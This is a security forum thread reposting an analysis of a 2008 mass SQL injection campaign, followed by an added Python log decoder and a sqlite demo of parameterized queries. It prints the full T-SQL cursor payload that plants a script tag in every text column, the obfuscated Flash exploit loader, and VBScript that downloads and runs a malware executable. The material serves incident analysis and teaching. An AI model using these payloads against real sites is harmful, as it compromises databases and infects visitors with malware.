More SQL Injections - very active right now, (Fri, Aug 8th) - nSecurity Portal
 

#1
08-08-2008, 09:21 AM
FeedMaster (Automated User - RSS Feed Aggregator)
More SQL Injections - very active right now, (Fri, Aug 8th)

Scott, one of our readers, wrote in to let us know that attempts were being made on his servers through an SQL injection. He was the first and assisted with analysis, but he was not the last. Since the first report we have received several in the last 4 hours or so. There seems to be a lot of activity with this particular attack. It looks like a repeat/variant on the attacks mentioned by Bojan here.

Overview:

w.js --- new.htm ---|--- Flash.htm ---|--- i1.html ---|
                    |                 |--- f2.html ---|--- i/f16.swf, i/f28.swf, i/f64.swf,
                    |                                 |    i/f115.swf, i/f45.swf, i/f47.swf
                    |--- 06014.htm
                    |--- yahoo.htm ---|
                    |--- office.htm --|--- rondll32.exe --- msyahoo.exe --- wsv.exe/thunder.exe
                    |--- ksx.htm -----|

The Injection:

The string being injected is HTTP/1.1 302 26 - .NET CLR 2.0.50727) :

Which breaks down into:

DECLARE @T varchar(255),@C varchar(4000)
DECLARE Table_Cursor CURSOR FOR
  select a.name,b.name from sysobjects a,syscolumns b
  where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
  exec('update['+@T+'] set ['+@C+']=['+@C+']+''</title><script src=hXXp://sdo. 1000mg.cn/csrss/w.js></script><!--'' where '+@C+' not like ''%</title><script src=hXXp://sdo. 1000mg.cn/csrss/w.js></script><!--''')
  FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
% AS% CHAR(@)

Various types of sites seem to be hit at the moment. From the reports we've had it is not specific to asp, cfm or php, but we don't have a lot of information on this just yet.

Next:

A user visiting the site will hit w.js which, if they are using English, will pull down new.htm. new.htm reports to a stats site and has a number of iframes that grab the next set of htm pages: flash.htm, 06014.htm, yahoo.htm, office.htm and ksx.htm.

Flash.htm

Checks to see if you are using IE or FF and selects either i1.html or f2.html.

i1.html / f2.html

These files contain some JavaScript:

<script type="text/javascript" src="swfobject.js"></script>
<div id="flashcontent111"></div><div id="flashversion222"></div>
<script type="text/javascript">
c="118,97,114,32,118,101,114,115,105,111----snip----116,46,119,114,105,116,101,40,34,34,41";
c=eval("String.fromCharCode("+c+")");
document.write("<script>"+c+"<\/script>");
</script>
<script>
if(version['major']==9){
  document.getElementById('flashversion').innerHTML="";
  if(version['rev']==115){var so=new SWFObject("./f115.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent");}
  else if(version['rev']==64){var so=new SWFObject("./f64.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent");}
  else if(version['rev']==47){var so=new SWFObject("./f47.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent");}
  else if(version['rev']==45){var so=new SWFObject("./f45.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent");}
  else if(version['rev']==28){var so=new SWFObject("./f28.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent");}
  else if(version['rev']==16){var so=new SWFObject("./f16.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent");}
  else if(version['rev']=124){if(document.getElementById){document.getElementById('flashversion').innerHTML="";document.write();}}
}
</script>

So depending on the Flash version running and the browser, a different file is tried (the IE version uses i64, etc). Detection for these is poor. The IE versions 9/36 at VT detect the file as malicious and for FF 10/36 detect the file as being malicious.

yahoo.htm

The yahoo.htm file executes a VBScript to download rondll32.exe and saves it as msyahoo.exe, after which it attempts to execute it.

<object classid='clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F' id='test'></object>
<script language='vbscript'>
test.GetFile "hXXp://www.XXXXX.com/XXXX/rondll32.exe","c:\\msyahoo.exe",5,1,"tiany"
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "c:\\msyahoo.exe"
</script>

Office.htm

Attempts to create ActiveX objects and pulls the same rondll32.exe. It looks like rondll32.exe pulls down thunder.exe and wsv.exe.

ksx.htm

Attempts to get the browser to include the rondll32.exe file.

Detection for rondll32.exe is good, with most AV products catching this one. 06014.htm was unavailable at the time I checked.

These attacks are happening right now. The people that reported them identified the attacks in their log files and IDS systems. It is good to see that people are checking their logs. Currently about 4000 sites are infected, but mostly with the older version of w.js and a different go-to site. This round looks like it has just started. We'll keep an eye on how this develops.

Cheers.

Mark - Shearwater

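A decoder for the kind of log lines the reporters above were checking, added here as an example and not code from the ISC diary or this thread. The diary says the injected string "breaks down into" the cursor payload; this campaign delivered that payload hex-wrapped as DECLARE @S ...;SET @S=CAST(0x... AS VARCHAR(4000));EXEC(@S);-- in a query-string value, and the decoder below URL-decodes a request, unwraps every CAST(0x... AS [N]VARCHAR) it finds (UTF-16LE for the NVARCHAR variant), and flags the sysobjects/syscolumns cursor pattern. The log lines, the /products.asp path and the hex-wrapped delivery shape are constructed assumptions for the example; the diary itself shows only the decoded payload.

```python
"""Decode and flag the hex-wrapped T-SQL injection in web server logs.

Added example, not code from the ISC diary or this forum. The delivery shape
(DECLARE @S ...;SET @S=CAST(0x<hex> AS VARCHAR(4000));EXEC(@S);-- stacked on a
query-string parameter) is assumed from the diary's 'AS CHAR(' residue. The log
lines are CONSTRUCTED by encoding the diary's payload that way, so the decoder
is checked by round trip.
"""
import re
from urllib.parse import quote, unquote_plus

# The diary's decoded payload, with the HTML tags the page rendering stripped
# put back, the typo "231or" fixed, and the defanged hXXp host kept (the
# diary's extra space after "sdo." removed).
CURSOR_PAYLOAD = (
    "DECLARE @T varchar(255),@C varchar(4000) "
    "DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b "
    "where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) "
    "OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN "
    "exec('update['+@T+'] set ['+@C+']=['+@C+']+''</title><script src=hXXp://sdo.1000mg.cn/csrss/w.js></script><!--'' "
    "where '+@C+' not like ''%</title><script src=hXXp://sdo.1000mg.cn/csrss/w.js></script><!--''') "
    "FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor"
)

# CAST(0x... AS [N]VARCHAR|CHAR ...): group 1 is the hex, group 2 the N prefix.
CAST_RE = re.compile(r"CAST\(\s*0x([0-9A-Fa-f]+)\s+AS\s+(N?)(?:VARCHAR|CHAR)", re.IGNORECASE)
# Each marker appears in the diary's payload; requiring all of them keeps a
# benign CAST(0x.. AS VARCHAR) in a legitimate query from matching.
INJECTION_MARKERS = ("sysobjects", "syscolumns", "@@fetch_status", "exec('update")
SCRIPT_SRC_RE = re.compile(r"<script\s+src=([^\s>]+)", re.IGNORECASE)


def build_log_line(payload, sql_type="VARCHAR"):
    """CONSTRUCTED IIS-style log line: payload hex-wrapped in CAST(... AS sql_type),
    stacked after a numeric parameter and URL-encoded as the server logged it."""
    raw = payload.encode("utf-16-le") if sql_type.upper().startswith("N") else payload.encode("latin-1")
    stacked = (f";DECLARE @S {sql_type}(4000);SET @S=CAST(0x{raw.hex().upper()}"
               f" AS {sql_type}(4000));EXEC(@S);--")
    return ("2008-08-08 09:21:00 10.0.0.5 GET /products.asp id=12" + quote(stacked)
            + " 80 - 192.0.2.10 Mozilla/4.0+(compatible;+MSIE+6.0;+.NET+CLR+2.0.50727) 302 0 0")


def decode_cast_hex(text):
    """Return the decoded string of every CAST(0x... AS ...) in text.
    NVARCHAR/NCHAR payloads are UTF-16LE; VARCHAR/CHAR payloads are single-byte."""
    decoded = []
    for m in CAST_RE.finditer(text):
        hexstr = m.group(1)
        if len(hexstr) % 2:      # malformed hex: skip it rather than crash the scanner
            continue
        raw = bytes.fromhex(hexstr)
        if m.group(2).upper() == "N":
            decoded.append(raw.decode("utf-16-le", errors="replace"))
        else:
            decoded.append(raw.decode("latin-1"))
    return decoded


def analyze_log_line(line):
    """Return (decoded_sql, injected_script_url) when the line carries the
    sysobjects/syscolumns cursor injection, otherwise None."""
    request = unquote_plus(line)        # the log keeps the request URL-encoded
    for sql in decode_cast_hex(request):
        lowered = sql.lower()
        if all(marker in lowered for marker in INJECTION_MARKERS):
            m = SCRIPT_SRC_RE.search(sql)
            return sql, (m.group(1) if m else None)
    return None


def scan_log(lines):
    """[(line_number, injected_url)] for every hit in an iterable of log lines."""
    hits = []
    for n, line in enumerate(lines, 1):
        found = analyze_log_line(line)
        if found:
            hits.append((n, found[1]))
    return hits


# CONSTRUCTED sample log: a normal request, a benign CAST that decodes to "A",
# the VARCHAR-wrapped injection and an NVARCHAR (UTF-16LE) variant of it.
SAMPLE_LOG = [
    "2008-08-08 09:20:58 10.0.0.5 GET /products.asp id=12 80 - 192.0.2.9 Mozilla/4.0 200 0 0",
    "2008-08-08 09:20:59 10.0.0.5 GET /report.asp q=" + quote("CAST(0x41 AS VARCHAR(10))")
    + " 80 - 192.0.2.9 Mozilla/4.0 200 0 0",
    build_log_line(CURSOR_PAYLOAD),
    build_log_line(CURSOR_PAYLOAD, "NVARCHAR"),
]

if __name__ == "__main__":
    for n, url in scan_log(SAMPLE_LOG):
        print(f"line {n}: cursor injection delivering {url}")
```

Requiring all four markers, rather than just CAST(0x, is what keeps this from firing on legitimate hex casts; a broader scanner for other campaigns would swap in its own marker set but keep the same unwrap step, since the UTF-16LE/NVARCHAR variant is easy to miss if only single-byte decoding is tried.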
#2
09-25-2008, 07:58 PM
talon (Administrator)

Yes, we were targeted the other day; it's all over our HTTP logs. It failed because it's missing some important elements.

1. VULNERABILITY

If the virus creator wanted to be creative, they'd at least go for something vulnerable, i.e. scripts that don't use 'parameterized parameters'.
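An added example of the point about parameterized queries (not talon's code or the diary's), using sqlite3 so it runs offline. The same attacker input is fed to a page that concatenates it into SQL and to one that binds it as a parameter: the first runs the stacked UPDATE that appends the script tag to every row, the second matches nothing and changes nothing. sqlite has no sysobjects/syscolumns cursor, so the injected statement is a one-table version of the diary's UPDATE; the products table, its rows, the ?id= parameter and the REPLACE() cleanup at the end are all constructed for the example.

```python
"""Concatenated vs. parameterized lookup against the diary's stacked UPDATE.

Added example using sqlite3, not code from this thread or the ISC diary. The
table, rows and attacker input are constructed; executescript() stands in for
drivers (ADO + MS SQL, mysqli multi_query) that execute stacked statements.
"""
import sqlite3

INJECTED_TAG = "</title><script src=hXXp://sdo.1000mg.cn/csrss/w.js></script><!--"
# What the attacker sends as ?id= to a page that pastes the value into SQL
# (one-table sqlite form of the diary's cursor UPDATE).
ATTACK_INPUT = "12;UPDATE products SET description=description||'" + INJECTED_TAG + "';--"


def fresh_db():
    """Constructed catalogue table standing in for a small ASP/PHP site's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT, description TEXT)")
    conn.executemany("INSERT INTO products VALUES(?,?,?)",
                     [(12, "widget", "A fine widget"), (13, "gadget", "A finer gadget")])
    conn.commit()
    return conn


def product_name_vulnerable(conn, user_id):
    """The bug talon describes: user input concatenated into the statement text.
    Every stacked statement runs; the page's own SELECT is then read back."""
    sql = "SELECT name FROM products WHERE id=" + user_id
    conn.executescript(sql)                          # executes the attacker's UPDATE too
    row = conn.execute(sql.split(";")[0]).fetchone()  # the page's own query
    return row[0] if row else None


def product_name_parameterized(conn, user_id):
    """The fix: the value travels as a bound parameter, never as SQL text, so
    '12;UPDATE ...' is compared with the id column as one opaque string."""
    row = conn.execute("SELECT name FROM products WHERE id=?", (user_id,)).fetchone()
    return row[0] if row else None


def infected_ids(conn, tag=INJECTED_TAG):
    """Rows whose text now carries the injected script tag (what to search the DB for)."""
    return [r[0] for r in conn.execute(
        "SELECT id FROM products WHERE description LIKE ? ORDER BY id", ("%" + tag + "%",))]


def strip_tag(conn, tag=INJECTED_TAG):
    """Reverse the injection the way the cursor applied it: REPLACE the tag out
    of every affected text value. Returns the number of rows cleaned."""
    cur = conn.execute("UPDATE products SET description=REPLACE(description, ?, '') "
                       "WHERE description LIKE ?", (tag, "%" + tag + "%"))
    conn.commit()
    return cur.rowcount


if __name__ == "__main__":
    db = fresh_db()
    print(product_name_vulnerable(db, ATTACK_INPUT), infected_ids(db))    # widget [12, 13]
    print(strip_tag(db), infected_ids(db))                                  # 2 []
    print(product_name_parameterized(db, ATTACK_INPUT), infected_ids(db))  # None []
```

The vulnerable lookup still returns the right product for the attacker's request, which is why the page owner sees nothing wrong until every text column on the site carries the tag; the parameterized version returns no row for the same input and leaves the table untouched. The cleanup query mirrors the injection (the same LIKE pattern the cursor used to avoid double-appending), which is the per-column fix the reporters' log checks would have led to.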